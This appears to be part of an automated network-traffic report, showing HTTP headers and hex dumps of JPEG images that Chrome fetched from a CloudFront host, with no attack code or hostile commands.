                                                                                                                          Content-Length: 60211
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:21 GMT
                                                                                                                          Last-Modified: Mon, 31 Oct 2022 16:41:12 GMT
                                                                                                                          ETag: "7b142d0c22482e370c8144d20a1d80cf"
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                          Via: 1.1 65515d7b1028cd133489fb761d35fa06.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
                                                                                                                          X-Amz-Cf-Id: EHvVaWgk92-fmbsdBZE_sgmfnuq041O2HnyAoz6cfBhKg8qfw0z96g==
                                                                                                                          2025-01-13 21:01:20 UTC16384INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 02 00 39 00 39 00 00 ff e2 0f d0 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0f c0 61 70 70 6c 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 e6 00 0a 00 05 00 0a 00 25 00 22 61 63 73 70 41 50 50 4c 00 00 00 00 41 50 50 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 61 70 70 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 64 65 73 63 00 00 01 50 00 00 00 62 64 73 63 6d 00 00 01 b4 00 00 04 9c 63 70 72 74 00 00 06 50 00 00 00 23 77 74 70 74 00 00 06 74 00 00 00 14 72 58 59 5a 00 00 06 88 00 00 00 14 67 58 59 5a 00 00 06 9c 00 00 00 14 62 58 59 5a 00 00 06 b0 00 00 00 14 72
                                                                                                                          Data Ascii: JFIF99ICC_PROFILEapplmntrRGB XYZ %"acspAPPLAPPL-appldescPbdscmcprtP#wtpttrXYZgXYZbXYZr
                                                                                                                          2025-01-13 21:01:20 UTC645INData Raw: 5c de a5 ed 21 5f b7 14 bc 26 b9 6c 3f 80 4f 35 b2 f3 6b 1f 11 54 31 3b 82 8d 37 6e d7 27 a8 33 e9 c4 cd 3e 61 72 ee 8e e5 a4 e0 fc 62 1c bf 46 55 ca 2d bd b2 ec 42 a5 61 15 35 cd 53 55 c7 03 ec b2 ee 01 f1 84 fc 51 16 e5 7b 13 e2 fb 9d 44 bb b3 07 93 68 52 fd 03 31 f3 25 aa d7 1d 42 ee d4 db ae e7 aa 3e a7 a6 aa 95 99 c9 a7 56 a3 92 54 b7 94 7f 5c 7d 35 54 bf cd b3 7f d1 dc fd 13 1f 2f f7 4f dd 35 5b fa 73 ff 00 a6 62 c8 cc 44 52 12 33 95 39 d9 7a 6d 3e 59 c9 89 a9 b7 50 c3 0c b6 32 a7 1c 51 01 29 03 b4 92 40 8e e9 a9 7b 0b 6d 41 a4 56 23 da 91 7d e9 9c c4 85 0a 59 28 5c cb e8 9a 65 e5 4b 25 64 00 5c 42 14 54 91 92 01 24 70 27 8c 73 fd 04 e3 ad f6 00 ff 00 de 6a 67 d2 5b 89 e5 db e0 67 63 ad 56 f7 05 5f 3a dc 44 ae 69 bb 1f 3b f0 fd fa 1a ee b9 fa 5e d3
                                                                                                                          Data Ascii: \!_&l?O5kT1;7n'3>arbFU-Ba5SUQ{DhR1%B>VT\}5T/O5[sbDR39zm>YP2Q)@{mAV#}Y(\eK%d\BT$p'sjg[gcV_:Di;^
                                                                                                                          2025-01-13 21:01:20 UTC12792INData Raw: b5 3a a7 ef a2 7f e7 4c 72 ab 7b fc fd 4e fe 94 d7 e9 88 14 fa 8f 92 7f c2 a4 a5 e6 bf 0c d2 1c f4 80 7f 5c 66 84 54 4f f3 2d 3f fa 2b 5f a0 21 6c 68 c1 06 fd 22 da 1b ac b7 7e d7 d7 dd c1 6b 69 6d d3 56 a6 4c ae 4f a9 9b 93 a5 3c f3 2e 62 55 a0 77 56 94 90 70 41 1c 3b a1 a0 5d f6 15 ed a7 f3 ad 53 6f 8b 52 ad 41 9b 7d be b9 a6 6a 32 8b 97 5a d1 9c 6f 00 b0 09 19 04 66 3e a1 f3 10 d7 d3 56 73 af 36 77 1f fa b2 3e 90 e4 4b 1a 4c 8e e8 dd 6d 9d 12 d5 fb d2 92 dd 7a d1 d3 2b 9a b3 4d 75 4a 42 26 e4 69 6f 3c d2 94 93 85 00 a4 a4 82 41 e7 1a 54 4f 2f 45 11 ff 00 89 9d b9 ee 9d 4b e7 cc 42 b1 ab 6c 4f 44 d4 bd 0b d8 b3 69 4a dd cd 69 d6 ad ba 8a 64 3a d9 1f 54 24 dc 96 5a f3 2a e2 37 91 be 01 38 2a e6 39 18 8c 45 29 4a 51 52 8e 49 39 31 f4 63 b7 37 b5 0f 55 fd
                                                                                                                          Data Ascii: :Lr{N\fTO-?+_!lh"~kimVLO<.bUwVpA;]SoRA}j2Zof>Vs6w>KLmz+MuJB&io<ATO/EKBlODiJid:T$Z*78*9E)JQRI91c7U
                                                                                                                          2025-01-13 21:01:20 UTC4616INData Raw: 25 77 a2 f7 6c ca 24 d2 a5 d1 a6 08 a8 a4 28 a5 2f 48 d4 a5 dc 42 bc a3 2b 07 1e 70 23 cc fa db 1b 67 7e 25 e7 ff 00 da e5 ff 00 c4 85 ff 00 5d 03 6d 2f c6 ba 7f 35 ca fe c4 49 77 46 0e bf ea ae d0 da 45 73 dd 1a b1 72 7a b3 51 90 af f8 14 bb be 0e db 3b 8c f5 0d ab 77 08 00 1f 19 44 e7 cb 0d 0b a9 1e d6 07 44 c6 d6 97 6d 4d 86 2e 2a 0d 2a d4 90 51 05 e9 ba 8d 41 b5 a9 09 cf 1c 36 d1 52 94 7c 9c 3c f1 2c fb 28 6c ad 63 6c a3 a7 09 b2 6d 47 57 3f 50 9d 58 99 ab d5 9e 40 4b 93 af 81 80 70 3d 6a 12 38 25 39 38 e3 cc 93 0c e7 6e 4e 94 ca de 9b de 75 2d 21 d9 f5 89 05 d4 68 ee 19 6a ad c1 34 d8 7d 0d cc 0f 5c d3 0d 9f 15 5b bc 8a d5 91 90 40 1c 33 0c 2e ad b7 ae d7 f5 99 a3 37 33 af 77 43 4a 57 de cb 4c 06 50 3c c9 40 02 1b 13 56 3f 4e 90 bd 81 76 83 da 47 5f
                                                                                                                          Data Ascii: %wl$(/HB+p#g~%]m/5IwFEsrzQ;wDDmM.**QA6R|<,(lclmGW?PX@Kp=j8%98nNu-!hj4}\[@3.73wCJWLP<@V?NvG_
                                                                                                                          2025-01-13 21:01:20 UTC6396INData Raw: 9d 31 50 a9 d4 9f 44 b4 a4 ac ba 0a dc 79 d5 9c 25 29 03 99 24 c2 17 7e d8 bf ca 30 e0 ba 3f 92 95 6d 8b a5 c1 49 07 fe 1b 41 e2 3f 90 a8 86 8d 67 52 f6 48 da 2f 47 ad a3 78 ea 4e 93 d6 e8 74 54 ba 86 57 3a fb 69 2d a1 6a f5 a1 45 2a 3b b9 3c 38 e3 8c 72 18 fa 04 e9 31 4a 55 b1 5e a1 e4 03 86 a4 c8 c8 ff 00 d6 da 8f 9f b8 05 a9 21 7d 0b b7 7d 46 9d af b7 45 9a 99 85 78 05 6a dd 5c c3 8d 67 81 75 87 50 50 ac 77 84 ad 63 e1 8d 0b a5 c3 db 93 58 f7 16 99 f3 31 ed f4 39 7b 6b e6 7d ec 4f 7e 93 51 e2 f4 b8 7b 72 6b 1e e2 d3 3e 66 29 3a 8c c2 36 d9 6d 23 d5 19 db 71 37 7c 9e 9d dc 93 14 35 34 5f 15 16 a9 8f 2e 5c b6 09 05 7d 60 4e ee e8 c1 c9 ce 38 46 a5 1f 41 bb 05 b6 db fb 0c e9 fb 0f 21 2e 36 ba 14 d2 54 85 0c 85 02 f3 d9 04 76 88 85 3e 7c a3 b6 ec 57 7d 54
                                                                                                                          Data Ascii: 1PDy%)$~0?mIA?gRH/GxNtTW:i-jE*;<8r1JU^!}}FExj\guPPwcX19{k}O~Q{rk>f):6m#q7|54_.\}`N8FA!.6Tv>|W}T
                                                                                                                          2025-01-13 21:01:20 UTC6396INData Raw: ba 74 a3 72 ad f1 dd 19 51 ef 57 69 8f d5 f8 23 83 4b 88 63 56 2a 6b f9 74 f5 f7 cb a2 fd 4f 1e 2e ae 48 65 5b b3 1b bc a3 1a 3d 6f c2 63 2b bc a3 1a 7d 67 c2 63 fb 6c f6 3e 64 37 13 3b cf e1 84 f0 a1 d8 4f 1c 8e a3 a4 9e f5 c9 f3 44 4e 74 da 8f ff 00 11 e9 67 b9 f5 2f 9d 66 25 8e 77 d7 a7 cd 11 39 d3 6d f7 49 a5 9e e7 d4 be 75 98 e8 fc 87 25 e7 23 18 c1 c4 c1 db 0f 9f 61 fe 8e fb 57 6b 1d 2e a8 ea 05 6f 51 aa 74 17 a4 aa ee 53 53 2f 2d 24 db c9 52 52 da 17 bd 95 28 1c f8 f8 c7 92 30 95 ce 8d db 71 8c 79 e3 b2 6c 8d a2 75 ed 7a d7 ab 56 c8 a4 48 bc ec a8 9f 6a 72 a8 fa 52 77 65 a4 da 58 53 ab 51 ec e0 30 3b c9 02 24 7e 83 d0 af a3 b2 73 81 db 8b 56 2e 9a 8c b8 c7 d8 a5 e5 98 97 27 8f 6a 8e ff 00 c9 0f 27 42 f6 6d d1 dd 9c 68 2e 50 74 a6 d2 66 9b e1 38 f0
                                                                                                                          Data Ascii: trQWi#KcV*ktO.He[=oc+}gcl>d7;ODNtg/f%w9mIu%#aWk.oQtSS/-$RR(0qyluzVHjrRweXSQ0;$~sV.'j'Bmh.Ptf8
                                                                                                                          2025-01-13 21:01:20 UTC4616INData Raw: 70 1c 13 8e 38 04 f0 8f 8f fc 3d c2 e1 59 62 21 42 2a 69 dd 34 ad af c0 eb cf a9 6b 5f 42 15 2c b7 d4 2a 94 97 0a 67 1a 5a d5 d4 ba 9e b4 24 87 12 71 8c 79 3c b0 f2 ec 26 9e dd 0e 34 c3 9c 4a 42 92 e7 56 73 c3 89 c8 e2 21 b3 ed 43 62 af 4a b6 8c b8 e9 0c cb 09 7a 7c fc da 2b 94 f1 bb 90 1a 98 f1 8a 47 99 7b e2 3b 76 95 55 e9 ca 96 65 e5 6e 13 d5 a0 ac a5 b5 20 85 7c 91 f4 a3 85 a1 9b 36 45 7e f6 46 1c 9f 71 c0 c9 0f 06 9c 43 a9 6d d0 95 63 80 4a 79 c7 4a a0 4c ac a0 25 49 20 f6 70 18 c7 74 73 fa 64 c3 13 12 ad 38 86 42 39 1c 91 93 1b 55 36 a0 d3 29 4e 50 46 3c 62 40 3d 9e 48 f4 33 26 e2 ca 91 be a4 b7 90 95 73 cf 62 a2 d7 39 81 08 25 a6 90 f2 12 b6 d0 09 78 87 10 ad d2 37 78 73 39 85 81 c4 bc da 5d 4f 22 23 51 66 58 99 ee 5f 0c 63 4f ac f8 4c 64 7b 94 63
                                                                                                                          Data Ascii: p8=Yb!B*i4k_B,*gZ$qy<&4JBVs!CbJz|+G{;vUen |6E~FqCmcJyJL%I ptsd8B9U6)NPF<b@=H3&sb9%x7xs9]O"#QfX_cOLd{c
                                                                                                                          2025-01-13 21:01:20 UTC1730INData Raw: 89 c2 74 65 5a db 1d 71 1e 0a c5 61 f8 95 1e 1a ea 26 ea 26 d3 b3 b2 b5 ef f9 7d 47 3f bc 20 de 1d f0 cc 2d bb ee f4 7b 67 0b ae b6 f5 d3 53 5d 42 5e b5 2c d3 53 46 65 45 d4 20 ee 65 21 59 c8 07 26 3a 06 9f 5d 17 24 ee cb 15 eb 86 6e b9 3a f5 4d 94 4e f5 73 6b 79 45 e4 e0 8c 61 5c f8 47 4a 78 f8 d4 69 25 fd 39 8f 2e 2f c2 b5 f0 91 94 a5 51 3b 55 54 ba ee d2 77 f7 6a 38 fd e1 df 06 f0 ef 86 61 67 df 57 a4 ce cf 77 ad 66 62 e9 aa 39 3d 2b 50 95 43 13 2b 99 51 71 b4 92 9c 84 ab 39 00 c5 fb 2d ea 3d db 54 d5 36 e9 17 0d cf 51 9f 96 9c 92 7d 28 6a 66 65 4b 48 71 38 50 20 13 cf 00 c6 23 c4 a1 29 c2 16 7e d1 e9 ad e0 bc 4d 1c 3e 26 bf 31 3e 43 69 ab 3d 6c 93 d3 e6 3c cc 88 32 0f 6c 32 bd a6 75 2e f0 a7 6a c4 fd 26 df ba 2a 52 12 b2 52 ec 34 5a 96 99 52 13 be 53
                                                                                                                          Data Ascii: teZqa&&}G? -{gS]B^,SFeE e!Y&:]$n:MNskyEa\GJxi%9./Q;UTwj8agWwfb9=+PC+Qq9-=T6Q}(jfeKHq8P #)~M>&1>Ci=l<2l2u.j&*RR4ZRS
                                                                                                                          2025-01-13 21:01:20 UTC6636INData Raw: 70 27 b0 f0 3f 01 8d 63 4f ed ef aa 1d 34 d4 d6 d2 8d e7 64 11 2b 3e df 0e d6 dc 59 3f ee ef 47 c9 ab 96 bc 21 91 59 fb 5f 34 93 3f 7f 80 95 5e 19 5f 11 f6 8a 9c c8 35 45 26 d2 5e c4 9b 8a 4e dd 93 37 cb 46 7d 9a ae d7 9e a9 cb a8 29 b9 b2 a7 d0 47 68 54 a8 3f ae 31 6b 04 97 d5 d6 d3 5f 53 e0 6f a2 5a 4b a9 c7 e4 cb ad c3 f1 91 1a 86 cd 93 af 54 35 be 83 31 30 ac ac 32 e3 79 ef 08 60 a4 7c 40 46 d3 69 5d 96 db 3b 4f dc 77 45 d3 56 96 91 92 65 d9 d6 9b 75 e5 61 25 40 06 92 07 97 19 8d d3 9c 6a d2 49 ed 2a 87 9f 17 85 a9 81 e2 13 95 34 dc a9 61 6c ad bd ee d2 36 2d 8c 6a 64 51 af 0a 12 95 c5 a2 dc c8 1e 74 29 27 f4 44 78 bb 1b 7b 24 5c 9f d0 55 f3 c2 13 ec bb 52 96 92 d5 6b aa 95 2b 30 87 25 a7 a4 66 fa 95 a0 f8 ab 08 73 29 23 fa a4 98 51 b1 bf b2 45 c9 fd
                                                                                                                          Data Ascii: p'?cO4d+>Y?G!Y_4?^_5E&^N7F})GhT?1k_SoZKT5102y`|@Fi];OwEVeua%@jI*4al6-jdQt)'Dx{$\URk+0%fs)#QE


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          108192.168.11.204993354.239.153.764431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:20 UTC440OUTGET /app/uploads/gthl/2024/12/10213839/Screenshot-2024-12-10-at-9.32.59-PM-730x410.jpg HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:20 UTC487INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          Content-Length: 93722
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:21 GMT
                                                                                                                          Last-Modified: Wed, 11 Dec 2024 02:38:41 GMT
                                                                                                                          ETag: "3c6dc49970f3cc5916494cd761497389"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                          Via: 1.1 c57d1eb27f41d3e95fc5060845849c06.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
                                                                                                                          X-Amz-Cf-Id: nq8DyHf6SIiJnPP5jtcW-Zr2p1NNPtsu31XZF425Zr2vMWK92K5wzw==
                                                                                                                          2025-01-13 21:01:20 UTC16384INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 02 00 39 00 39 00 00 ff e2 0f d0 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0f c0 61 70 70 6c 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 e8 00 01 00 01 00 0b 00 0c 00 2d 61 63 73 70 41 50 50 4c 00 00 00 00 41 50 50 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 61 70 70 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 64 65 73 63 00 00 01 50 00 00 00 62 64 73 63 6d 00 00 01 b4 00 00 04 9c 63 70 72 74 00 00 06 50 00 00 00 23 77 74 70 74 00 00 06 74 00 00 00 14 72 58 59 5a 00 00 06 88 00 00 00 14 67 58 59 5a 00 00 06 9c 00 00 00 14 62 58 59 5a 00 00 06 b0 00 00 00 14 72
                                                                                                                          Data Ascii: JFIF99ICC_PROFILEapplmntrRGB XYZ -acspAPPLAPPL-appldescPbdscmcprtP#wtpttrXYZgXYZbXYZr
                                                                                                                          2025-01-13 21:01:20 UTC607INData Raw: 60 ca 2e c4 b2 82 6c 37 f7 c2 1e 5a 8d 42 86 22 b1 a1 ba 69 0c 2c 00 37 04 7d 6d 61 84 4f 40 91 a9 a0 a9 56 0f 38 36 6d 40 b3 a1 23 52 86 c0 3c 8e 9e 33 4e 68 fe 6a 01 a8 84 56 0d d7 7d ec 0f f8 8c 21 e3 30 56 6b 33 af 95 e6 68 d0 18 6b 51 6e 8c 30 2a 9c be 81 84 32 19 dc cd 4f 65 86 36 24 b0 51 d7 61 fd 30 49 21 cc 06 63 1d 65 2b 5a 91 a2 90 1d 6a a6 ce 7b 9e e4 fe bb 60 0f 3c f9 89 6a 99 1a 96 28 e8 c2 6b 46 d3 70 c5 77 1d 3a 5b ae 18 25 44 8d 47 1b a7 99 24 8f 2d bc c0 a4 8f 2c f4 be df d0 61 71 c9 e4 c5 32 32 ce cb 38 29 e5 89 2c b6 da e4 7d 0e 17 96 79 b1 83 04 51 34 51 20 67 76 32 12 1d 6f db ea 30 1e a3 ae 96 9c c4 3e 62 4a b1 13 15 d0 b6 52 58 74 b7 f3 37 fb 61 cd 65 45 1c f4 55 33 c1 e5 2b 4a 17 cf 47 73 65 f6 23 b8 37 b0 c4 45 64 b3 d0 d3 09 44
                                                                                                                          Data Ascii: `.l7ZB"i,7}maO@V86m@#R<3NhjV}!0Vk3hkQn0*2Oe6$Qa0I!ce+Zj{`<j(kFpw:[%DG$-,aq228),}yQ4Q gv2o0>bJRXt7aeEU3+JGse#7EdD
                                                                                                                          2025-01-13 21:01:20 UTC16384INData Raw: 45 0c 2f ae d6 37 df f9 7b 60 12 b2 2a 3a 81 a4 9f e7 6c 63 db 74 e9 b4 c4 6f 09 28 92 3b d9 e3 36 b5 89 bf 5f b6 07 3a 85 d6 ab 1a 81 d5 58 ee 71 1b 47 98 34 52 ac 1a 75 42 76 1a 85 ec 71 27 10 82 62 c7 51 60 07 51 bd 86 13 bc 2f a5 eb 92 36 84 64 f4 e8 ea d2 c4 15 c8 ea 09 b7 eb 6c 36 82 96 42 f6 32 36 ab 1b af 62 3b 62 4a ae 9e 18 24 67 69 2c 2e 05 af 6b f7 c2 24 71 14 76 21 d0 9b 81 d3 7c 64 ae 49 46 be 18 df 79 47 cd 14 a5 83 2a ea 0b fc 5f e5 84 19 e4 31 68 55 66 01 ae 76 c3 99 65 61 18 ba 96 b1 b2 9b 03 b6 00 55 63 9a d7 b1 3b 9b 77 c6 4e f9 47 bd 62 27 83 39 a8 a9 ab 2c 23 8c 43 36 e0 93 dc e1 af 93 25 23 94 ad 4e 9b 11 d7 6c 4f aa a4 6e 5e 5d 27 60 ca c1 6f b7 b6 1e d6 e5 b4 19 a5 19 91 c1 07 a9 73 fb a0 61 f5 7e 56 7e 0b be 37 ac f3 0b 4e 49 c4
                                                                                                                          Data Ascii: E/7{`*:lcto(;6_:XqG4RuBvq'bQ`Q/6dl6B26b;bJ$gi,.k$qv!|dIFyG*_1hUfveaUc;wNGb'9,#C6%#NlOn^]'`osa~V~7NI
                                                                                                                          2025-01-13 21:01:20 UTC1024INData Raw: 72 c8 d3 79 ba 12 45 b2 86 02 e2 fd cf fe 36 c6 a1 fc 32 20 aa 97 c2 86 56 f0 90 bf fa 5e bd 98 69 be e2 73 7f e6 36 c6 e0 4e d0 23 ab bc 6d a9 6c 08 6d c0 27 d8 7b 7f 86 02 3a 96 82 ae 25 35 1e 71 d4 82 ea 0a ea 28 7d ef f5 c3 6a 99 2a 32 ea 79 95 27 79 ea 65 d4 5c 30 b8 52 7f 7a dd 6d ed 6c 3e 75 a9 85 ad d5 dc 69 d0 3a 31 20 9b 83 88 98 72 d9 d1 9a 5a a8 a4 58 d8 94 44 53 72 47 7b b1 c0 7b cc 4d 32 19 9a 44 92 5b 27 9a c3 d3 b7 50 3d af 81 54 ad 0c c0 4a 60 6d 30 92 ad 1e 8b 06 40 41 1d f6 22 db 5e f8 5d 7c 4b 96 d2 c8 4d 54 ac c5 47 a3 56 e4 9d 95 76 de e3 b6 20 28 56 b6 a2 9e 79 aa 69 d2 68 67 61 12 b2 6c 97 1b 36 a1 d0 9c 04 94 92 d6 14 76 a9 a3 8e 68 55 3d 1e 67 51 ec 01 e9 d3 0d 1c 49 a6 59 2a 22 6a 78 e2 2a 22 b2 82 c8 0e f7 23 a6 db d8 7d 70 88
                                                                                                                          Data Ascii: ryE62 V^is6N#mlm'{:%5q(}j*2y'ye\0Rzml>ui:1 rZXDSrG{{M2D['P=TJ`m0@A"^]|KMTGVv (Vyihgal6vhU=gQIY*"jx*"#}p
                                                                                                                          2025-01-13 21:01:20 UTC16384INData Raw: 59 40 b7 7f fc 76 c3 14 82 aa 19 51 94 99 55 2e 6e 52 da be be d8 76 25 79 a5 f9 69 63 5b 8b c8 35 0d 80 ff 00 96 1f 2c 37 87 c9 92 cd 19 bd f7 b0 c0 45 18 a3 86 f1 44 91 a8 3e b2 bb 82 6e 77 b7 d7 05 f2 0c 9a 84 45 f4 b2 8d 56 6d c1 ed 6f 6c 2d e1 76 62 90 c6 0c 65 40 62 0f aa e3 eb 8a 40 c9 24 61 5d da 13 ab 48 0b b9 6b 7b e0 1c 41 99 2a 05 a7 90 97 03 d2 49 da e7 14 e2 0e 1e c8 78 bf 26 9f 23 cf b2 9a 5c ca 82 a9 0a 4b 4f 53 18 74 60 7a 82 0e 19 4d a8 48 b4 e2 95 54 92 51 5d fb 77 36 fb fb e1 fd 21 78 e3 5d 20 aa a6 f6 27 be 1f a4 91 f9 67 ba bc 4f cb 43 b9 f9 f0 df 6a 29 2a 78 b7 90 b5 06 2b ea 96 5e 1f a9 93 f0 cb 75 fc 07 3f 97 e8 ad 7f be 34 fe a3 97 9c eb a3 a8 96 92 a7 96 5c 42 26 81 da 39 07 ec b9 0d 98 1b 1d c0 df 71 8e dd a5 64 75 41 a3 65 29
                                                                                                                          Data Ascii: Y@vQU.nRv%yic[5,7ED>nwEVmol-vbe@b@$a]Hk{A*Ix&#\KOSt`zMHTQ]w6!x] 'gOCj)*x+^u?4\B&9qduAe)
                                                                                                                          2025-01-13 21:01:20 UTC2754INData Raw: 94 f0 18 90 41 34 ae 59 45 81 2d d4 7d 31 e3 10 95 8b a3 b1 52 6e c1 89 3d 3d 81 e9 81 3d 3d 48 28 05 fc b8 fa a2 8b ff 00 2c 2d e4 75 01 e5 a7 76 23 f2 d9 ac 4f e9 80 6f 24 71 d3 aa fe 33 22 93 a8 8b 1b b0 ff 00 4f ae 24 1e 53 a6 e2 cb 1b 2d c5 ac 6e 30 38 c5 3d 44 ca b2 2c 85 94 5c a9 1d 07 df 08 92 78 8c 86 04 99 7c ab 69 6b 10 0d fb 6f 80 61 26 65 1a 23 51 52 8d 4c ca 7f 11 da ca 0f df 14 58 e1 65 0c d5 d7 24 5c 91 7b 1c 26 b7 2c 8e 5b 1a 39 42 b2 36 a5 6b 8b 03 fd ef 7c 0a d0 0d 8d 2c f7 fa 32 db 01 68 45 07 ca 35 54 89 74 80 d9 0f 9e 48 05 4d f6 1b 5c 01 fc 5d 30 78 1d de 90 55 53 d4 23 30 0c 83 54 be 64 6b b7 40 7b 5f ef 80 4a d0 eb 5a e9 e7 66 8e 68 54 a6 bb 75 20 8d 3d 37 50 6d b7 6c 56 87 2e 8d 12 2f 95 4a bf 95 08 64 a8 01 7d 16 e8 42 fb b7 db
                                                                                                                          Data Ascii: A4YE-}1Rn====H(,-uv#Oo$q3"O$S-n08=D,\x|ikoa&e#QRLXe$\{&,[9B6k|,2hE5TtHM\]0xUS#0Tdk@{_JZfhTu =7PmlV./Jd}B
                                                                                                                          2025-01-13 21:01:20 UTC16384INData Raw: b1 0d 2d 1d 39 21 9d a4 b6 c1 da cb b7 60 31 bb dc 79 98 8f f6 57 38 82 95 d7 ce 6a 1a 84 66 be ea 7c b6 c0 7c fa f8 4c bf fd 6b 39 74 6f 63 fe d4 53 fe 9f 88 71 dd 4e 66 e4 07 fd 88 e2 ba 86 56 a8 f3 32 3a bf 28 1e a4 f9 4d 62 2d db 7c 70 cb c2 be 59 98 53 f8 9f e5 ed 45 4e 59 58 b1 c7 c4 d4 ec e4 c0 c3 6d 7b f6 c7 7f 1f 28 15 b1 3d 2b a4 cf 4c ea 51 86 ad 91 48 20 8d fa 82 0f 4c 07 cf bf 84 a9 96 83 c5 17 2e 2b 27 96 28 92 3e 24 a6 bb 48 6c a3 d5 df 1d fb c9 96 b2 1c c1 5a 25 80 29 88 a8 f5 12 51 6f b1 3f 5d af 8e 32 f8 aa f0 25 ce 5e 4a f3 0f 30 e2 be 5e 70 d6 6b 9e 70 b4 f5 8f 5b 97 56 65 50 34 93 51 12 fa 84 72 22 dd 90 a9 e8 c0 58 80 0e 2d 2a 6f 19 3e 37 72 38 17 87 07 30 78 a6 17 89 56 05 8a 5c bd 4c f6 1b 01 a9 a3 2f 7f d7 01 79 7c 57 27 a7 aa f1
                                                                                                                          Data Ascii: -9!`1yW8jf||Lk9tocSqNfV2:(Mb-|pYSENYXm{(=+LQH L.+'(>$HlZ%)Qo?]2%^J0^pkp[VeP4Qr"X-*o>7r80xV\L/y|W'
                                                                                                                          2025-01-13 21:01:20 UTC1024INData Raw: 3a ed b5 f1 e9 06 a2 b1 68 3b f5 b6 17 14 45 01 4d 25 41 26 f6 ef 80 58 77 75 57 8c 2b 29 1b 9b e2 b7 bb ea bf a4 75 c2 4a ac 43 55 96 c3 a6 3d e6 dc 80 02 dd be b8 03 89 06 ca 4f 5e 98 51 8d 49 b9 18 01 40 50 3b 9b 58 df 1e 57 45 16 05 b4 f5 b9 c0 12 c1 5c 81 d0 8e 98 5b 2a db a7 4c 51 19 74 83 7c 55 98 01 d7 73 d3 00 32 da 54 b5 af 61 88 f9 aa 03 7a 6e ca cd b5 8e da 7e ff 00 4c 3b 9a 39 0a 92 ce c2 fb 6d db 11 c9 4b 2b 23 24 9a 8d 98 92 ea 05 c8 f6 df 00 b8 9d 8e b8 11 d7 d3 b1 d8 9b fd b0 61 e5 c6 34 a1 5b 80 2e a5 ad 8a c5 1a aa 85 55 75 43 bd be b8 4a 79 f1 39 26 15 21 c5 fa 6f 7c 01 19 0d d6 58 34 de d7 61 7c 54 09 52 26 67 1a d8 ee 0f 7c 55 a3 54 60 0c 86 ee 2e 2f db 04 55 1a 46 a9 0f f3 c0 04 54 16 56 24 15 3a 6f ea e8 71 e8 9a 2d 3a b6 56 71 b9
                                                                                                                          Data Ascii: :h;EM%A&XwuW+)uJCU=O^QI@P;XWE\[*LQt|Us2Tazn~L;9mK+#$a4[.UuCJy9&!o|X4a|TR&g|UT`./UFTV$:oq-:Vq
                                                                                                                          2025-01-13 21:01:20 UTC16384INData Raw: 6c b5 22 15 07 2c 86 75 1a 19 0a 09 6e 17 7f dd c4 86 66 c6 44 57 a1 68 5a 6f 2c f9 8c b7 24 01 6d b0 28 66 8e 05 31 94 f2 88 b7 97 75 bd d4 db 51 bf 6b e0 1a 4a b2 47 0d 35 25 a4 49 95 42 48 8c 6c b7 3b 0d ff 00 ae 0b 0c 13 45 44 d1 d5 d5 de 47 b0 64 45 20 db b0 27 f7 be f8 79 5b 0c 13 41 21 aa b3 b8 0d e5 10 f7 04 5b 6b 8f 7f e9 86 b1 51 e6 1e 43 4f 04 cc e4 46 b6 0c 09 5b f4 fd 30 1c da aa f8 63 73 95 78 f7 88 38 c3 84 b9 ef 96 70 fc f9 ad 7d 55 42 3d 34 75 50 c8 23 96 52 e2 36 74 23 dc 7d 2e 31 9f bc 25 78 55 e7 1f 24 39 87 5b c5 bc cb e7 94 bc 67 97 cd 96 49 48 94 52 cd 54 56 19 8b 2e 97 b4 cc 57 a0 3d 31 b7 34 91 4e 94 4c ed 0c 2e c1 74 90 c9 70 c4 6f b6 0a 21 f3 28 8d 4c ba 24 8d 97 5b 43 60 02 fd b0 1a 71 e2 87 e1 ef 93 f3 8f 8e a2 e6 77 01 f1 cd
                                                                                                                          Data Ascii: l",unfDWhZo,$m(f1uQkJG5%IBHl;EDGdE 'y[A![kQCOF[0csx8p}UB=4uP#R6t#}.1%xU$9[gIHRTV.W=14NL.tpo!(L$[C`qw
